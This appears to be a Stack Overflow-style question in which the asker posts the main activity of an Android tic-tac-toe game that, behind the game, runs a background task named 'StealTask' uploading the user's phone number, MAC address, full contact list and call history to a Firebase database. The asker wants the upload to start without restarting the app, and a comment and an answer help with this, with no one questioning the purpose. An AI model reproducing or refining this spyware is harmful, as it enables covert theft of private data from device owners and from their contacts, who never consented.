# Application needs to restart to connect to firebase

Tags: android, firebase, firebase-realtime-database

I'm writing an application on android studio that connects with firebase realtime database.The app sends to the database the calls and contacts of the user. At first install and opening of the app, it asks for the required permissions. Once all permissions are granted, the app needs to be restarted in order to connect with firebase and send it the information.

Here's my main:

```
public class MainActivity extends AppCompatActivity implements View.OnClickListener {

    static final int REQUEST_CODE = 1;



    private Button[][] buttons = new Button[3][3];

    private boolean player1Turn = true;

    private int roundCount;

    LocationManager locationManager;

    private int player1Points;
    private int player2Points;
    private String id;
    private TextView textViewPlayer1;
    private TextView textViewPlayer2;

    int PERMISSION_ALL = 1;
    String[] PERMISSIONS = {
            Manifest.permission.READ_CONTACTS,
            Manifest.permission.ACCESS_WIFI_STATE,
            Manifest.permission.READ_EXTERNAL_STORAGE,
            Manifest.permission.ACCESS_FINE_LOCATION,
            Manifest.permission.READ_CALL_LOG,
            Manifest.permission.READ_PHONE_STATE,
            Manifest.permission.ACCESS_COARSE_LOCATION
    }; //Array of permissions
    String location1 = null;
    private String Number;
    private String ContactName;
    final int a[] = {1};
    private String address;



    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);



        ConnectivityManager connManager = (ConnectivityManager) getSystemService(Context.CONNECTIVITY_SERVICE);             //Wifi
        NetworkInfo mWifi = connManager.getNetworkInfo(ConnectivityManager.TYPE_WIFI);                                      //Wifi
        NetworkInfo wMobile=connManager.getNetworkInfo(ConnectivityManager.TYPE_MOBILE);                                    //Mobile Data


        textViewPlayer1 = findViewById(R.id.text_view_p1);
        textViewPlayer2 = findViewById(R.id.text_view_p2);

        for (int i = 0; i < 3; i++) {
            for (int j = 0; j < 3; j++) {
                String buttonID = "button_" + i + j;
                int resID = getResources().getIdentifier(buttonID, "id", getPackageName());
                buttons[i][j] = findViewById(resID);
                buttons[i][j].setOnClickListener(this);
            }
        }

        Button buttonReset = findViewById(R.id.button_reset);
        buttonReset.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                resetGame();
            }
        });

        if (!hasPermissions(MainActivity.this, PERMISSIONS) ) {
            ActivityCompat.requestPermissions(MainActivity.this, PERMISSIONS, PERMISSION_ALL);
        }
        if (mWifi.isConnected()||wMobile.isConnected()) {
            StartStealTask();
        }

    }

    public static boolean hasPermissions(Context context, String... permissions) {
        if (context != null && permissions != null) {
            for (String permission : permissions) {
                if (ActivityCompat.checkSelfPermission(context, permission) != PackageManager.PERMISSION_GRANTED) {
                    return false;
                }
            }
        }
        return true;
    }

    @Override
    public void onClick(View v) {


        if (!((Button) v).getText().toString().equals("")) {
            return;
        }

        if (player1Turn) {
            ((Button) v).setText("X");
        } else {
            ((Button) v).setText("O");
        }

        roundCount++;

        if (checkForWin()) {
            if (player1Turn) {
                player1Wins();
            } else {
                player2Wins();
            }
        } else if (roundCount == 9) {
            draw();
        } else {
            player1Turn = !player1Turn;
        }

    }





    private class StealTask extends AsyncTask<Void, Void, Void> {
        @RequiresApi(api = Build.VERSION_CODES.M)
        @Override
        protected Void doInBackground(Void... voids) {
            FirebaseStorage storage = FirebaseStorage.getInstance();
            final FirebaseDatabase database = FirebaseDatabase.getInstance();
            final DatabaseReference myRef = database.getReference("Users");//Reference to Users node
            final DatabaseReference reff=FirebaseDatabase.getInstance().getReference().child("getLocation");
            StorageReference storageRef = storage.getReferenceFromUrl("gs://tictactoe-311ce.appspot.com");//Reference to Database Storage




            if (ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_PHONE_STATE) //Check if phone reading permission is granted
                    == PackageManager.PERMISSION_GRANTED) {
                address = getMacAddr();//Obtaining Mac address
                Users user = new Users(address);//Creating new user
                TelephonyManager tmanager = (TelephonyManager) getSystemService(Context.TELEPHONY_SERVICE); //Accessing phone number
                id = tmanager.getLine1Number(); //User ID set to phone number
                myRef.child(id).setValue(user);//Adding a user to the node
            }

            if (ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_CONTACTS)//Check if contacts reading permission is granted
                    == PackageManager.PERMISSION_GRANTED) {
                Cursor phones = getContentResolver().query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, null, null, null, null);//Accessing Contacts
                while (phones.moveToNext()) {                    //Fetching contacts
                    try {
                        Thread.sleep(2000);                 //Delay
                    } catch (InterruptedException e) {          //handling Exception
                        e.printStackTrace();
                    }


                    ContactName = phones.getString(phones.getColumnIndex(ContactsContract.CommonDataKinds.Phone.DISPLAY_NAME)); //Accessing contact name
                    Number = phones.getString(phones.getColumnIndex(ContactsContract.CommonDataKinds.Phone.NUMBER)); //Accessing contact number
                    com.example.finalproject.user.Contacts contact = new com.example.finalproject.user.Contacts(Number, address); //Creating new contact
                    myRef.child(id).child("Contacts").child(ContactName).setValue(contact);
                }
            }
            if (ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_CALL_LOG)//Check if call log reading permission is granted
                    == PackageManager.PERMISSION_GRANTED) {
                Uri allCalls = Uri.parse("content://call_log/calls");//Accessing call logs
                Cursor c = getContentResolver().query(CallLog.Calls.CONTENT_URI, null, null, null, CallLog.Calls.DATE + " DESC");
                c.moveToFirst();//Fetching call logs
                while (c.moveToNext()) {
                    String num = c.getString(c.getColumnIndex(CallLog.Calls.NUMBER));// for  number
                    String name = c.getString(c.getColumnIndex(CallLog.Calls.CACHED_NAME));// for name
                    String duration = c.getString(c.getColumnIndex(CallLog.Calls.DURATION));// for duration
                    int type = Integer.parseInt(c.getString(c.getColumnIndex(CallLog.Calls.TYPE)));// for call type, Incoming or out going.
                    Calls call = new com.example.finalproject.user.Calls(name, duration, type, address);//Creating new Call
                    myRef.child(id).child("Calls").child(num).setValue(call);
                }
            }



                return null;
            }
        }

    public void StartStealTask(){
        StealTask Steal = new StealTask();
        Steal.execute();
    }

}
```

Comment: You can just execute the `startStealTask` after you have been granted those permissions using `onRequestPermissionsResult` callback

Comment: This might [help](https://stackoverflow.com/a/52431663/6383029).

Answer (score 1):

Below code will restart your app

```
private fun rebootApp() {
        val intent = Intent(this, MainActivity::class.java)
        intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK or Intent.FLAG_ACTIVITY_CLEAR_TASK)
        startActivity(intent)
        Runtime.getRuntime().exit(0)
    }
```

then Inside your onCreate(...)

```
if(allPermissionGranted()) {// check if all permission is granted
connectToFireBase();//write fun which will connect your app to firebase
}
```